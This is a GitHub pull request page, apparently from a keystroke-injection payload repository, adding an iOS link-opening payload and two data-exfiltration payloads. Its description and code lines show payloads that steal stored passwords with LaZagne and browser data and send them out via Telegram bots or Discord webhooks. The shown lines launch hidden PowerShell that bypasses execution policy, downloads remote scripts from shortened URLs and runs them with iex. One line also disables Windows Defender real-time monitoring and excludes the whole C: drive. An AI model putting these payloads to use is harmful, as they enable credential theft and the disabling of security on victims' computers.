Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

1 New Mobile IOS payload | 2 New Exfiltration payloads #410

Merged
merged 29 commits into from
Jul 11, 2024

Conversation

Mr-Proxy-source
Copy link
Contributor

@Mr-Proxy-source Mr-Proxy-source commented Dec 16, 2023

  • Added payload for opening links for IOS 17 and older
  • Added Lazagne exfil payload for exfiltrating all passwords through telegram bot
  • Added Google exfil payload that uses 7zip to zip user data, upload it to file-sharing service and send download link through telegram bot or discord webhook.
  • Fixed some mistakes in Copy and Waste

@Mr-Proxy-source Mr-Proxy-source changed the title New IOS Payload - Open Link New Mobile Payload - Open Link | New Exfiltration Payload - Lazagne Exfil Dec 18, 2023
Line 10 added r after GUI, line 11 added delay.
This payload runs powershell script that zip google user data, uses gofile.io api to upload it, and then sends download link to telegram bot or discord webhook.
@Mr-Proxy-source Mr-Proxy-source changed the title New Mobile Payload - Open Link | New Exfiltration Payload - Lazagne Exfil 1 New Mobile IOS payload | 2 New Exfiltration payloads Dec 19, 2023
DELAY 500
REM If you want to use Telegram change just bot token and chat id
REM If you want to use Discord Webhook dont do anything with botToken and chatID just change $webhook
STRING powershell -w h -NoP -Ep Bypass -Command $botToken='bot_token'; $chatID='chat_id'; $webhook='dc_webhook'; irm https://t.ly/pPFpN | iex
Copy link
Member

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Copy link
Member

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

DELAY 1500
GUI r
DELAY 500
STRING powershell.exe -Command "Set-MpPreference -DisableRealtimeMonitoring $true; Add-MpPreference -ExclusionPath 'C:\'; Start-Sleep -Seconds 5; powershell -w h -NoP -Ep Bypass -Command '$bt='bot-token'; $ci='chat-id'; irm https://t.ly/-qlYd | iex'"
Copy link
Member

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Copy link
Member

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

DELAY 1000
GUI SPACE
DELAY 250
REM Put your link down there ↓
Copy link
Member

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

@dallaswinger dallaswinger added the pending requested changes requires changes before merge label Jan 2, 2024
@Mr-Proxy-source
Copy link
Contributor Author

All requested changes have been made, if there is anything else let me know.
Happy new year btw :D

Changed to example.com
Changed to example.com
@Mr-Proxy-source
Copy link
Contributor Author

Here i fixed it lmk if there is anything else.

@hak5peaks hak5peaks merged commit b469aff into hak5:master Jul 11, 2024
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
pending requested changes requires changes before merge
Projects
None yet
Development

Successfully merging this pull request may close these issues.

None yet

3 participants